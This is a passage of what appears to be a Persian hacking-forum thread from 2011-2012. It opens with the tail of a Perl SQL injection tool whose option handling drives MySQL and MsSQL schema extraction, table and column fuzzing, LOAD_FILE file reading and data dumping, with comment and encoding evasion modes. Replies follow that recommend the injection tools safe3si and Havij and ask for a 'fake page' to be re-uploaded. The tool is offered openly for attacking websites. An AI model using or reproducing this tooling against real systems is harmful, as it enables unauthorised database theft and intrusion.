	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlschema($mysql_schema_target,$evasion);
}

if (defined($mysql_dump_target))
{
     if (!defined($sql_dump_column))
	 {
	     print "[!] Please Defind At Least A Column\n";
		 exit();
	 }
     elsif (!defined($sql_dump_table))
	 {
	     print "[!] Please Defind Table Name\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MySQL Data Dumper details\n\n" ;
         print "[+] Target : $mysql_dump_target\n" ;
         if ($evasion eq '/*')
	     {
	         print "[+] Evasion : /**/\n" ;
	     }
         elsif ($evasion eq '%20')
	     {
	         print "[+] Evasion : %20\n" ;
	     }
	     else
	     {
	         print "[+] Evasion : --\n" ;
			 $evasion = "--"
	     }
		 mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
	 }	 
}

if (defined($mysql_fuzz_table))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Tables Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_table\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);	 
	 }
}

if (defined($mysql_fuzz_column))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
     elsif(!defined($sql_dump_table))
     {
	     print "[!] Please Define A Table To Fuzz it's Columns\n";
		 exit();
     }	
	 else
	 {
	     print "[+] MySQL Columns Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_column\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);	 
	 }
}

if (defined($mysql_load_file))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Load_File Fuzzer\n\n" ;
         print "[+] Target : $mysql_load_file\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfile($mysql_load_file,$evasion,$word_list);	 
	 }
}

if (defined($mssql_details_target))
{
	 print "[+] MsSQL DB Details\n\n" ;
     print "[+] Target : $mssql_details_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqldetails($mssql_details_target,$evasion);	 
}

if (defined($mssql_table_target))
{
	 print "[+] MsSQL Tables Extractor\n\n" ;
     print "[+] Target : $mssql_table_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqltable($mssql_table_target,$evasion);	 
}

if (defined($mssql_column_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Defind At Least A Table do Extract from\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Columns Extractor\n\n" ;
         print "[+] Target : $mssql_column_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);	 
	 }
}

if (defined($mssql_dump_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Defind At Least A Table\n";
		 exit();
	 }
     elsif(!defined($sql_dump_column))
	 {
	     print "[!] Please Defind At Least A Column\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Data Dumper\n\n" ;
         print "[+] Target : $mssql_dump_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);	 
	 }
}

not working

**Tornado2800** · 08-11-2011, 09:23 PM

نقل قول:

نوشته اصلی توسط firemaker

با سلام

safe3si ابزاری است که برای sql injection می شه از اون استفاده کرد که دوستان برای دانلود می تونند به لینک زیر مراجعه کنند (البته گفته باشم قدرتش به havij نمی رسه)

[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

با تشکر

مطمئنید قدرتش به هویچ نمیرسه؟
تست کردید ؟

**sahil_kinara** · 10-09-2011, 04:06 PM

Thanx dear...

**HackerGharb** · 11-04-2011, 10:18 PM

فقط یکم قدیمی.
لطفا فیک پیج رو دوباره آپ کنید

**KingDomEviL** · 02-20-2012, 08:45 AM

ثانكيووووو

ابزارهای موضوع
پرینت این صفحه / حالت نمایش بصورت پرینت شده ارسال این صفحه به ایمیل یک دوست یا خودتان
نحوه نمایش
حالت خطی تعویض به حالت ترکیبی تعوض به حالت رشته ای